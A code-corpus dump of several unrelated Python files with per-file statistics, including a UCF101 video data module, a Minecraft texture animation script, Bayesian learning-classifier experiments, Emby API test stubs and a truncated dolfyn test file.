# # Copyright (C) 2020 Intel Corporation # # SPDX-License-Identifier: BSD-3-Clause # import logging from collections import Counter import torch from torch.utils.data import DataLoader from torchvision.transforms import transforms as T from torchvision.transforms import functional as TF import pytorch_lightning as pl from sklearn.model_selection import StratifiedShuffleSplit from oscar.data.ucf101 import UCF101Dataset from oscar.data.video import ClipSampler, MiddleClipSampler from oscar.data.transforms import ExCompose, Permute, Squeeze, Unsqueeze, ExSplitLambda from MARS.dataset.preprocess_data import get_mean logger = logging.getLogger(__name__) class MARSDataModule(pl.LightningDataModule): def __init__( self, modality, frames_root, annotation_dir, fold=1, batch_size=16, num_workers=1, frame_size=112, clip_length=16, clip_step=1, mid_clip_only=False, random_resized_crop_scale=(0.5, 1.0), test_indices=None, test_size=0, random_seed=0, collate_fn=None, frame_cache_dir=None, train_file_patterns=["{:05d}.jpg", "TVL1jpg_x_{:05d}.jpg", "TVL1jpg_y_{:05d}.jpg"], test_file_patterns=["{:05d}.jpg"], ): super().__init__() assert modality in ['RGB', 'RGB_Flow', 'RGBMasked_Flow', 'RGBMasked_FlowMasked', 'RGBSeg_Flow', 'RGBSegMC_Flow', 'RGBSegSC_Flow', 'RGBKeySC_Flow'] self.modality = modality self.frames_root = frames_root self.annotation_dir = annotation_dir self.fold = fold self.batch_size = batch_size self.num_workers = num_workers self.frame_size = frame_size self.clip_length = clip_length self.clip_step = clip_step self.mid_clip_only = mid_clip_only self.random_resized_crop_scale = random_resized_crop_scale self.test_indices = test_indices self.test_size = test_size self.random_seed = random_seed self.collate_fn = collate_fn self.frame_cache_dir = frame_cache_dir self.train_file_patterns = train_file_patterns self.test_file_patterns = test_file_patterns from detectron2.data import MetadataCatalog self.palette = MetadataCatalog.get('coco_2017_val').thing_colors if 'RGBSegMC_' in self.modality: self.input_channels = len(self.palette) + 2 # COCO-things + XY elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality: self.input_channels = 1 + 2 # Mask + XY else: self.input_channels = 3 + 2 # RGB + XY @classmethod def add_argparse_args(cls, parser): group = parser.add_argument_group(cls.__name__) group.add_argument('--modality', default='RGB', type=str, choices=['RGB', 'RGB_Flow', 'RGBMasked_Flow', 'RGBMasked_FlowMasked', 'RGBSeg_Flow', 'RGBSegMC_Flow', 'RGBSegSC_Flow', 'RGBKeySC_Flow']) group.add_argument('--dataset', default='UCF101', type=str, choices=['UCF101']) group.add_argument('--only_RGB', default=False, action='store_true') group.add_argument('--batch_size', default=32, type=int) group.add_argument('--frame_dir', default=None, type=str) group.add_argument('--annotation_path', default=None, type=str) group.add_argument('--frame_mask_dir', default=None, type=str) group.add_argument('--n_workers', default=4, type=int) group.add_argument('--split', default=1, type=int, choices=[1, 2, 3]) group.add_argument('--sample_size', default=112, type=int) group.add_argument('--sample_duration', default=16, type=int) group.add_argument('--step_between_clips', default=1, type=int) group.add_argument('--random_resized_crop_scale_min', default=0.5, type=float) group.add_argument('--random_resized_crop_scale_max', default=1.0, type=float) group.add_argument('--test_size', default=0, type=int) group.add_argument('--test_index', default=None, type=int, nargs='+') group.add_argument('--random_seed', default=1, type=bool, help='Manually set random seed of sampling validation clip') group.add_argument('--mid_clip_only', default=False, type=bool) group.add_argument('--shuffle_axes', default=None, type=int, nargs='+') return parser def prepare_data(self): UCF101Dataset(self.frames_root, self.annotation_dir, self.train_file_patterns, fold=self.fold) def setup(self, stage=None): logger.info("Setting up data module for stage: %s", stage) channels_mean = torch.tensor([*get_mean('activitynet'), 127.5, 127.5]) train_channels_mean = channels_mean test_channels_mean = channels_mean[0:3] # Create robust feature transform robust_extractor = None if 'RGBMasked_' in self.modality: from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.ablator import AblatorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = AblatorPyTorch(channels_mean / 255, detectron2=dt2) elif 'RGBSeg_' in self.modality: from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.paletted_semantic_segmentor import PalettedSemanticSegmentorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = PalettedSemanticSegmentorPyTorch(channels_mean[0:3] / 255, detectron2=dt2, palette=self.palette) elif 'RGBSegMC_' in self.modality: from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=len(self.palette)) train_channels_mean = 127.5 test_channels_mean = 127.5 elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality: # TODO: Create another segmentor class that is faster and selects objects relevant to UCF101 from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir) robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=1) # 1 channel == person mask train_channels_mean = 127.5 test_channels_mean = 127.5 # Apply robust feature extractor to RGB channels only if not _FlowMasked if robust_extractor is not None and '_FlowMasked' not in self.modality: robust_extractor = ExSplitLambda(robust_extractor, 3, 0, dim=-1) robust_transform = ExCompose([ T.Normalize(0, 255), # [0, 255] -> [0, 1] Permute(0, 2, 3, 1), # TCHW -> THWC Unsqueeze(0), # THWC -> NTHWC robust_extractor, # Apply robust feature extractor Squeeze(0), # NTHWC -> THWC Permute(0, 3, 1, 2), # THWC -> TCHW T.Normalize(0, 1/255), # [0, 1] -> [0, 255] ]) # Train transform # FIXME: Don't load flow when modality does not specify _Flow! # FIXME: Is there a way to decouple rgb and flow datasets like we did above? # The problem is they need to be synchronized somehow. train_transform = ExCompose([ robust_transform, T.RandomResizedCrop(self.frame_size, scale=self.random_resized_crop_scale, ratio=(1., 1.)), # Crop then Resize T.RandomApply([TF.hflip, ExSplitLambda(T.Normalize(255, -1), 1, -2, dim=-1)]), # Horizontal flip and invert x-flow randomly T.Normalize(train_channels_mean, 1), # [0, 255] -> ~[-128, 128] Permute(1, 0, 2, 3), # TCHW -> CTHW ]) train_sampler = ClipSampler(self.clip_length, self.clip_step) # Test transform test_transform = ExCompose([ robust_transform, T.Resize(self.frame_size), T.CenterCrop(self.frame_size), T.Normalize(test_channels_mean, 1), # [0, 255] -> ~[-128, 128] Permute(1, 0, 2, 3), # TCHW -> CTHW ]) test_sampler = range if self.mid_clip_only: test_sampler = MiddleClipSampler(self.clip_length, self.clip_step) if stage == 'fit' or stage is None: logger.info("Loading training data...") self.train_dataset = UCF101Dataset(self.frames_root, self.annotation_dir, self.train_file_patterns, train=True, fold=self.fold, transform=train_transform, sampler=train_sampler) logger.info("train data = %d", len(self.train_dataset)) logger.info("Loading validation data...") self.val_dataset = UCF101Dataset(self.frames_root, self.annotation_dir, self.test_file_patterns, train=False, fold=self.fold, transform=test_transform, sampler=train_sampler) logger.info("val data = %d", len(self.val_dataset)) if stage == 'test' or stage is None: logger.info("Loading test data...") test_dataset = UCF101Dataset(self.frames_root, self.annotation_dir, self.test_file_patterns, train=False, fold=self.fold, transform=test_transform, sampler=test_sampler) # Select test indices... if self.test_indices is not None: logger.info("Selecting data indices: %s", self.test_indices) test_dataset = torch.utils.data.Subset(test_dataset, self.test_indices) # ...or subsample test_dataset using a stratified split of test_size elements. elif self.test_size > 0: y = test_dataset.targets if test_dataset.target_transform is not None: y_transform = [test_dataset.target_transform(y_) for y_ in y] sss = StratifiedShuffleSplit(n_splits=1, test_size=self.test_size, random_state=self.random_seed) _, indices = next(sss.split(y, y_transform)) y_selected = [y[i] for i in indices] logger.info("Stratified subsampling test dataset to %d samples: %s", self.test_size, Counter(y_selected)) test_dataset = torch.utils.data.Subset(test_dataset, indices) self.test_dataset = test_dataset logger.info("test data = %d", len(self.test_dataset)) def train_dataloader(self): return DataLoader(self.train_dataset, batch_size=self.batch_size, shuffle=True, num_workers=self.num_workers, pin_memory=True, drop_last=True, collate_fn=self.collate_fn) def val_dataloader(self): return DataLoader(self.val_dataset, batch_size=self.batch_size, shuffle=False, num_workers=self.num_workers, pin_memory=True, drop_last=True, collate_fn=self.collate_fn) def test_dataloader(self): return DataLoader(self.test_dataset, batch_size=1, # Must be 1 because we can't batch whole videos shuffle=False, num_workers=self.num_workers, pin_memory=True, drop_last=False, collate_fn=self.collate_fn)
45.508834
202
0.601444
1,412
12,879
5.255666
0.20255
0.029646
0.040965
0.031263
0.415577
0.348875
0.322733
0.291066
0.252796
0.251853
0
0.025222
0.310428
12,879
282
203
45.670213
0.810382
0.074618
0
0.25
0
0
0.079855
0.005217
0
0
0
0.003546
0.004545
1
0.031818
false
0
0.095455
0.013636
0.15
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9dc0e3438ed94163bddc922821b2e616468b1a
2,704
py
Python
bin/changes.py
kcrca/clarity
84acb9b17bd8b84222bf25e3bb32fc578832e37f
[ "CC-BY-4.0" ]
1
2016-08-25T02:17:47.000Z
2016-08-25T02:17:47.000Z
bin/changes.py
kcrca/clarity
84acb9b17bd8b84222bf25e3bb32fc578832e37f
[ "CC-BY-4.0" ]
null
null
null
bin/changes.py
kcrca/clarity
84acb9b17bd8b84222bf25e3bb32fc578832e37f
[ "CC-BY-4.0" ]
2
2016-08-01T05:02:30.000Z
2022-01-14T12:58:14.000Z
#!/usr/bin/env python3 # Generate the animations and images needed to provide the "changes" texture pack. __author__ = 'arnold' import os import random import json import collections from PIL import Image import clip weeks_in_year = 52 timings = collections.OrderedDict() timings['autumn'] = 2 timings['winter'] = 8 timings['spring'] = 2 day = 24000 debug_timing = False if debug_timing: weeks_in_year = 8 timings['winter'] = 2 day = 2 week = day * 7 transition = week / 2 timings['summer'] = weeks_in_year - sum(timings[x] for x in timings) year = weeks_in_year * week if debug_timing: transition = 70 frames = [] animation = {'frametime': transition} wrapper = {'animation': animation} index = 0 for season in timings: duration = timings[season] stay_time = duration * week - transition if debug_timing: stay_time = week frame_json = {'index': index, 'time': stay_time} frames.append(frame_json) frames.append(index) index += 1 # Set the seed to prevent the mcmeta changing each time this is run. Otherwise we end up checking a new file each time # we run the script. random.seed(13) os.chdir(clip.directory('top', 'changes.repack', 'override', 'assets', 'minecraft', 'textures', 'block')) transparent = (0, 0, 0, 0) for tree in ('oak', 'birch', 'jungle', 'big_oak', 'acacia'): leaves_img = None branches_img = None h = 0 index = 0 adjust_start = random.randrange(0, day) adjust_end = day - adjust_start adjusted_frames = frames[:] if adjust_start: adjusted_frames.insert(0, {'index': 0, 'time': adjust_start}) if adjust_end: adjusted_frames.insert(len(adjusted_frames) - 1, {'index': len(timings) - 1, 'time': adjust_end}) animation['frames'] = adjusted_frames for season in timings: season_img = Image.open('%s/leaves_%s.png' % (season, tree)) if not leaves_img: w, h = season_img.size leaves_img = Image.new(season_img.mode, (w, 4 * h), transparent) branches_img = Image.new(season_img.mode, (w, 4 * h), transparent) frame_pos = h * index if season == 'winter': branches_img.paste(season_img, (0, frame_pos)) else: leaves_img.paste(season_img, (0, frame_pos)) index += 1 animation['interpolate'] = True with open('leaves_%s.png.mcmeta' % tree, 'w') as f: json.dump(wrapper, f, indent=2) animation['interpolate'] = False with open('branches_%s.png.mcmeta' % tree, 'w') as f: json.dump(wrapper, f, indent=2) leaves_img.save('leaves_%s.png' % tree, optimize=True) branches_img.save('branches_%s.png' % tree, optimize=True)
29.075269
118
0.651257
376
2,704
4.531915
0.345745
0.03169
0.025822
0.021127
0.146714
0.123239
0.123239
0.092723
0.092723
0.092723
0
0.018993
0.221154
2,704
92
119
29.391304
0.790123
0.088018
0
0.150685
1
0
0.114947
0.008936
0
0
0
0
0
1
0
false
0
0.082192
0
0.082192
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd9ea740497b5430ed79706f049d86c226916d0f
8,929
py
Python
exp2.py
jdrugo/LCSBookCode
ce9b8f35919e7dd959d007e6543d1479bbe2a26a
[ "MIT" ]
1
2020-11-25T14:57:49.000Z
2020-11-25T14:57:49.000Z
exp2.py
jdrugo/LCSBookCode
ce9b8f35919e7dd959d007e6543d1479bbe2a26a
[ "MIT" ]
null
null
null
exp2.py
jdrugo/LCSBookCode
ce9b8f35919e7dd959d007e6543d1479bbe2a26a
[ "MIT" ]
null
null
null
"""Trains a Bayesian LCS with a GA on the Waterhouse (1996) test function. """ import sys from numpy import double, array, ones, empty, arange, empty, hstack, \ sqrt, exp, sort, sum, inf, power, dot, linspace, sin, pi from numpy.random import random, randn, binomial, uniform, normal import Gnuplot from ga import GeneticAlgorithm_TS from cls import RBF1DClStore, RBF1DIndv, \ SoftIntervalClStore, SoftInterval1DIndv from mcmc import SampleModelPosterior from experiments import read_data, write_data, write_raw_data, plot_cls, \ GA_experiment, MCMC_experiment waterhouse_data_file = "exp2_waterhouse.data" waterhouse_data_raw_file = "exp2_waterhouse_raw.data" waterhouse_data_points = 200 own_data_file = "exp2_own.data" own_data_raw_file = "exp2_own_raw.data" own_data_points = 300 noise_data_file = "exp2_noise.data" noise_data_raw_file = "exp2_noise_raw.data" noise_data_points = 200 sinus_data_file = "exp2_sinus.data" sinus_data_raw_file = "exp2_sinus_raw.data" sinus_data_points = 300 def write_waterhouse_data(): """Generates the data set and writes it to the data_file. """ # generate the data x, y #var = 0.44 var = 0.20 #var = 0.05 x = sort(random(waterhouse_data_points) * 4.0) y = 4.26 * (exp(-x) - 4 * exp(-2 * x) + 3 * exp(-3 * x)) \ + sqrt(var) * randn(waterhouse_data_points) # write the data write_data(x, y, waterhouse_data_file) def write_waterhouse_raw_data(): """Writes the raw data without noise. """ x = linspace(0, 4, 1000) y = 4.26 * (exp(-x) - 4 * exp(-2 * x) + 3 * exp(-3 * x)) write_data(x, y, waterhouse_data_raw_file) def read_waterhouse_data(): return read_data(waterhouse_data_file) def own_f(x): """Returns f(x) for given x. """ # functions are # f1(x) = 0.05 + 0.5 x # f2(x) = 2 - 4 x # f3(x) = -1.5 + 2.5 x fns = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double) # gaussian basis functions are given by (mu, var, weight): # (0.2, 0.05), (0.5, 0.01), (0.8, 0.05) gbfs = array([[0.2, 0.05, 0.5], [0.5, 0.01, 1.0], [0.8, 0.05, 0.4]], double) # plain function values fx = fns[:,0] + x * fns[:,1] #print "%f\t%f\t%f\t%f" % (x, fx[0], fx[1], fx[2]) # mixing weights mx = gbfs[:,2] * exp(-0.5 / gbfs[:,1] * power(x - gbfs[:,0], 2.0)) mx /= sum(mx) #print "%f\t%f\t%f\t%f" % (x, mx[0], mx[1], mx[2]) # return mixed function return dot(fx, mx) def write_own_data(): """Generates 'artificial' dataset and writes it to file. """ noise = 0.1 x = uniform(size = own_data_points) y = array([own_f(x_n) for x_n in x], double) + \ normal(size = own_data_points) * noise write_data(x, y, own_data_file) def write_own_raw_data(): """Writes raw classifier and function to file. """ x = linspace(0, 1.0, 1000) y = array([own_f(x_n) for x_n in x], double) W = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double) X = hstack((ones(len(x), double).reshape(len(x), 1), x.reshape(len(x), 1))) Y = dot(X, W.T) write_raw_data(x, hstack([y.reshape(len(x), 1), Y]), own_data_raw_file) def read_own_data(): return read_data(own_data_file) def noise_f(x): """function with different noise levels. """ if x > 0: return -1.0 + 2.0 * x else: return -1.0 - 2.0 * x def write_noise_data(): """Generates function with different leven of noise in different areas of the function. """ l_noise, u_noise = 0.6, 0.1 x = uniform(-1.0, 1.0, size = noise_data_points) y = array([noise_f(xn) + \ (normal(0.0, l_noise) if xn < 0 else normal(0.0, u_noise)) \ for xn in x], double) write_data(x, y, noise_data_file) def write_noise_raw_data(): """Writes the basic function. """ x = linspace(-1, 1, 1000) y = array([noise_f(x_n) for x_n in x], double) write_data(x, y, noise_data_raw_file) def read_noise_data(): return read_data(noise_data_file) def write_sinus_data(): """Generates sinusoid data with some noise. """ x = uniform(-1.0, 1.0, size = sinus_data_points) y = sin(2 * pi * x) + normal(0.0, 0.15, size = sinus_data_points) write_data(x, y, sinus_data_file) def write_sinus_raw_data(): """Generate sinusoid data without noise. """ x = linspace(-1.0, 1.0, 1000) y = sin(2 * pi * x) write_data(x, y, sinus_data_raw_file) def read_sinus_data(): return read_data(sinus_data_file) def exp2a(): """Running GA on waterhouse data. """ X, Y = read_waterhouse_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 4.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(4, 0.5) for p in xrange(20)], cl_store, RBF1DIndv, 'exp2a_fitness.data', 'exp2a_cls.data') def exp2b(): """Running MCMC on waterhouse data. """ X, Y = read_waterhouse_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 4.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(4, 0.5), cl_store, 'exp2b_varbound.data', 'exp2b_cls.data') def exp2c(): """Running GA on own data. """ X, Y = read_own_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 1.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(8, 0.5) for p in xrange(20)], cl_store, RBF1DIndv, 'exp2c_fitness.data', 'exp2c_cls.data') def exp2d(): """Running MCMC on own data. """ X, Y = read_own_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = RBF1DClStore(0.0, 1.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(8, 0.5), cl_store, 'exp2d_varbound.data', 'exp2d_cls.data') def exp2e(): """Running GA on noisy data, using soft interval classifiers. """ X, Y = read_noise_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(8, 0.5) for p in xrange(20)], cl_store, SoftInterval1DIndv, 'exp2e_fitness.data', 'exp2e_cls.data') def exp2f(): """Running MCMC on noisy data, using soft interval classifiers. """ X, Y = read_noise_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(8, 0.5), cl_store, 'exp2f_varbound.data', 'exp2f_cls.data') def exp2g(): """Running GA on sinusoid data, using soft interval classifiers. """ X, Y = read_sinus_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) # run experiment with over 100 epochs with 20 individuals in the pop. GA_experiment(X, Y, Xf, 250, [1 + binomial(8, 0.5) for p in xrange(20)], cl_store, SoftInterval1DIndv, 'exp2g_fitness.data', 'exp2g_cls.data') def exp2h(): """Running MCMC on sinusoid data, using soft interval classifiers. """ X, Y = read_sinus_data() N = X.shape[0] Xf = ones(N, double).reshape(N, 1) cl_store = SoftIntervalClStore(-1.0, 1.0) MCMC_experiment(X, Y, Xf, 500, 10, 0.25, 1 + binomial(8, 0.5), cl_store, 'exp2h_varbound.data', 'exp2h_cls.data') # run experiments from arguments if __name__ == '__main__': exp_modes = {'gen1': lambda: write_waterhouse_data(), 'gen2': lambda: write_own_data(), 'gen3': lambda: write_noise_data(), 'gen4': lambda: write_sinus_data(), 'raw1': lambda: write_waterhouse_raw_data(), 'raw2': lambda: write_own_raw_data(), 'raw3': lambda: write_noise_raw_data(), 'raw4': lambda: write_sinus_raw_data(), 'a': lambda: exp2a(), 'b': lambda: exp2b(), 'c': lambda: exp2c(), 'd': lambda: exp2d(), 'e': lambda: exp2e(), 'f': lambda: exp2f(), 'g': lambda: exp2g(), 'h': lambda: exp2h()} for argv in sys.argv[1:]: if not exp_modes.has_key(argv): print "--- Unkown experiment: %s" % argv else: print "--- Running '%s'" % argv exp_modes[argv]()
33.317164
80
0.579348
1,363
8,929
3.622157
0.142333
0.009723
0.014584
0.017825
0.416852
0.371278
0.348592
0.33887
0.33887
0.320235
0
0.063156
0.274723
8,929
267
81
33.441948
0.699197
0.077052
0
0.309392
0
0
0.068623
0.003354
0
0
0
0
0
0
null
null
0
0.044199
null
null
0.01105
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd9f9949e13417fd14f6292afebf26ca964e5be3
9,439
py
Python
test/test_live_tv_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
test/test_live_tv_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
test/test_live_tv_service_api.py
stanionascu/python-embyapi
a3f7aa49aea4052277cc43605c0d89bc6ff21913
[ "BSD-3-Clause" ]
null
null
null
# coding: utf-8 """ Emby Server API Explore the Emby Server API # noqa: E501 OpenAPI spec version: 4.1.1.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import unittest import embyapi from embyapi.api.live_tv_service_api import LiveTvServiceApi # noqa: E501 from embyapi.rest import ApiException class TestLiveTvServiceApi(unittest.TestCase): """LiveTvServiceApi unit test stubs""" def setUp(self): self.api = LiveTvServiceApi() # noqa: E501 def tearDown(self): pass def test_delete_livetv_channelmappingoptions(self): """Test case for delete_livetv_channelmappingoptions """ pass def test_delete_livetv_channelmappings(self): """Test case for delete_livetv_channelmappings """ pass def test_delete_livetv_listingproviders(self): """Test case for delete_livetv_listingproviders Deletes a listing provider # noqa: E501 """ pass def test_delete_livetv_recordings_by_id(self): """Test case for delete_livetv_recordings_by_id Deletes a live tv recording # noqa: E501 """ pass def test_delete_livetv_seriestimers_by_id(self): """Test case for delete_livetv_seriestimers_by_id Cancels a live tv series timer # noqa: E501 """ pass def test_delete_livetv_timers_by_id(self): """Test case for delete_livetv_timers_by_id Cancels a live tv timer # noqa: E501 """ pass def test_delete_livetv_tunerhosts(self): """Test case for delete_livetv_tunerhosts Deletes a tuner host # noqa: E501 """ pass def test_get_livetv_channelmappingoptions(self): """Test case for get_livetv_channelmappingoptions """ pass def test_get_livetv_channelmappings(self): """Test case for get_livetv_channelmappings """ pass def test_get_livetv_channels(self): """Test case for get_livetv_channels Gets available live tv channels. # noqa: E501 """ pass def test_get_livetv_channels_by_id(self): """Test case for get_livetv_channels_by_id Gets a live tv channel # noqa: E501 """ pass def test_get_livetv_guideinfo(self): """Test case for get_livetv_guideinfo Gets guide info # noqa: E501 """ pass def test_get_livetv_info(self): """Test case for get_livetv_info Gets available live tv services. # noqa: E501 """ pass def test_get_livetv_listingproviders(self): """Test case for get_livetv_listingproviders Gets current listing providers # noqa: E501 """ pass def test_get_livetv_listingproviders_available(self): """Test case for get_livetv_listingproviders_available Gets listing provider # noqa: E501 """ pass def test_get_livetv_listingproviders_default(self): """Test case for get_livetv_listingproviders_default """ pass def test_get_livetv_listingproviders_lineups(self): """Test case for get_livetv_listingproviders_lineups Gets available lineups # noqa: E501 """ pass def test_get_livetv_listingproviders_schedulesdirect_countries(self): """Test case for get_livetv_listingproviders_schedulesdirect_countries Gets available lineups # noqa: E501 """ pass def test_get_livetv_liverecordings_by_id_stream(self): """Test case for get_livetv_liverecordings_by_id_stream Gets a live tv channel # noqa: E501 """ pass def test_get_livetv_livestreamfiles_by_id_by_container(self): """Test case for get_livetv_livestreamfiles_by_id_by_container Gets a live tv channel # noqa: E501 """ pass def test_get_livetv_programs(self): """Test case for get_livetv_programs Gets available live tv epgs.. # noqa: E501 """ pass def test_get_livetv_programs_recommended(self): """Test case for get_livetv_programs_recommended Gets available live tv epgs.. # noqa: E501 """ pass def test_get_livetv_recordings(self): """Test case for get_livetv_recordings Gets live tv recordings # noqa: E501 """ pass def test_get_livetv_recordings_by_id(self): """Test case for get_livetv_recordings_by_id Gets a live tv recording # noqa: E501 """ pass def test_get_livetv_recordings_folders(self): """Test case for get_livetv_recordings_folders Gets recording folders # noqa: E501 """ pass def test_get_livetv_recordings_groups(self): """Test case for get_livetv_recordings_groups Gets live tv recording groups # noqa: E501 """ pass def test_get_livetv_recordings_groups_by_id(self): """Test case for get_livetv_recordings_groups_by_id Gets a recording group # noqa: E501 """ pass def test_get_livetv_recordings_series(self): """Test case for get_livetv_recordings_series Gets live tv recordings # noqa: E501 """ pass def test_get_livetv_seriestimers(self): """Test case for get_livetv_seriestimers Gets live tv series timers # noqa: E501 """ pass def test_get_livetv_seriestimers_by_id(self): """Test case for get_livetv_seriestimers_by_id Gets a live tv series timer # noqa: E501 """ pass def test_get_livetv_timers(self): """Test case for get_livetv_timers Gets live tv timers # noqa: E501 """ pass def test_get_livetv_timers_by_id(self): """Test case for get_livetv_timers_by_id Gets a live tv timer # noqa: E501 """ pass def test_get_livetv_timers_defaults(self): """Test case for get_livetv_timers_defaults Gets default values for a new timer # noqa: E501 """ pass def test_get_livetv_tunerhosts(self): """Test case for get_livetv_tunerhosts Gets tuner hosts # noqa: E501 """ pass def test_get_livetv_tunerhosts_types(self): """Test case for get_livetv_tunerhosts_types """ pass def test_get_livetv_tuners_discvover(self): """Test case for get_livetv_tuners_discvover """ pass def test_head_livetv_channelmappingoptions(self): """Test case for head_livetv_channelmappingoptions """ pass def test_head_livetv_channelmappings(self): """Test case for head_livetv_channelmappings """ pass def test_options_livetv_channelmappingoptions(self): """Test case for options_livetv_channelmappingoptions """ pass def test_options_livetv_channelmappings(self): """Test case for options_livetv_channelmappings """ pass def test_patch_livetv_channelmappingoptions(self): """Test case for patch_livetv_channelmappingoptions """ pass def test_patch_livetv_channelmappings(self): """Test case for patch_livetv_channelmappings """ pass def test_post_livetv_channelmappingoptions(self): """Test case for post_livetv_channelmappingoptions """ pass def test_post_livetv_channelmappings(self): """Test case for post_livetv_channelmappings """ pass def test_post_livetv_listingproviders(self): """Test case for post_livetv_listingproviders Adds a listing provider # noqa: E501 """ pass def test_post_livetv_programs(self): """Test case for post_livetv_programs Gets available live tv epgs.. # noqa: E501 """ pass def test_post_livetv_seriestimers(self): """Test case for post_livetv_seriestimers Creates a live tv series timer # noqa: E501 """ pass def test_post_livetv_seriestimers_by_id(self): """Test case for post_livetv_seriestimers_by_id Updates a live tv series timer # noqa: E501 """ pass def test_post_livetv_timers(self): """Test case for post_livetv_timers Creates a live tv timer # noqa: E501 """ pass def test_post_livetv_timers_by_id(self): """Test case for post_livetv_timers_by_id Updates a live tv timer # noqa: E501 """ pass def test_post_livetv_tunerhosts(self): """Test case for post_livetv_tunerhosts Adds a tuner host # noqa: E501 """ pass def test_post_livetv_tuners_by_id_reset(self): """Test case for post_livetv_tuners_by_id_reset Resets a tv tuner # noqa: E501 """ pass def test_put_livetv_channelmappingoptions(self): """Test case for put_livetv_channelmappingoptions """ pass def test_put_livetv_channelmappings(self): """Test case for put_livetv_channelmappings """ pass if __name__ == '__main__': unittest.main()
23.896203
78
0.637144
1,111
9,439
5.078308
0.10261
0.09252
0.105282
0.143566
0.830202
0.737859
0.521446
0.357497
0.193194
0.133286
0
0.01882
0.296324
9,439
394
79
23.956853
0.830623
0.447505
0
0.458333
1
0
0.001869
0
0
0
0
0
0
1
0.466667
false
0.458333
0.041667
0
0.516667
0
0
0
0
null
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
6
bda0ee2b60b3089f82bfd69b9afe911afcc77e80
4,454
py
Python
dolfyn/tests/test_vs_nortek.py
jklymak/dolfyn
eea98fe0021886cf654e25293c385c5c3707ff8d
[ "BSD-3-Clause" ]
null
null
null
dolfyn/tests/test_vs_nortek.py
jklymak/dolfyn
eea98fe0021886cf654e25293c385c5c3707ff8d
[ "BSD-3-Clause" ]
null
null
null
dolfyn/tests/test_vs_nortek.py
jklymak/dolfyn
eea98fe0021886cf654e25293c385c5c3707ff8d
[ "BSD-3-Clause" ]
null
null
null
from dolfyn.tests import test_read_adp as tr from dolfyn.tests import base from dolfyn.rotate.api import rotate2 from numpy.testing import assert_allclose import numpy as np import scipy.io as sio """ Testing against velocity and bottom-track velocity data in Nortek mat files exported from SignatureDeployment. inst2earth rotation fails for AHRS-equipped istruments and I don't know why - I believe it's due to an RC filter (or some such) on Nortek's side after they load in the orientation matrix from the AHRS (Check out the difference colorplots compared to non-AHRS instruments.) Using HPR- or quaterion-calc'd orientation matrices doesn't close the gap. """ def load_nortek_matfile(filename): # remember to transpose this data data = sio.loadmat(filename, struct_as_record=False, squeeze_me=True) d = data['Data'] # print(d._fieldnames) burst = 'Burst' bt = 'BottomTrack' beam = ['_VelBeam1', '_VelBeam2', '_VelBeam3', '_VelBeam4'] b5 = 'IBurst_VelBeam5' inst = ['_VelX', '_VelY', '_VelZ1', '_VelZ2'] earth = ['_VelEast', '_VelNorth', '_VelUp1', '_VelUp2'] axis = {'beam': beam, 'inst': inst, 'earth': earth} AHRS = 'Burst_AHRSRotationMatrix' # , 'IBurst_AHRSRotationMatrix'] vel = {'beam': {}, 'inst': {}, 'earth': {}} for ky in vel.keys(): for i in range(len(axis[ky])): vel[ky][i] = np.transpose(getattr(d, burst+axis[ky][i])) vel[ky] = np.stack((vel[ky][0], vel[ky][1], vel[ky][2], 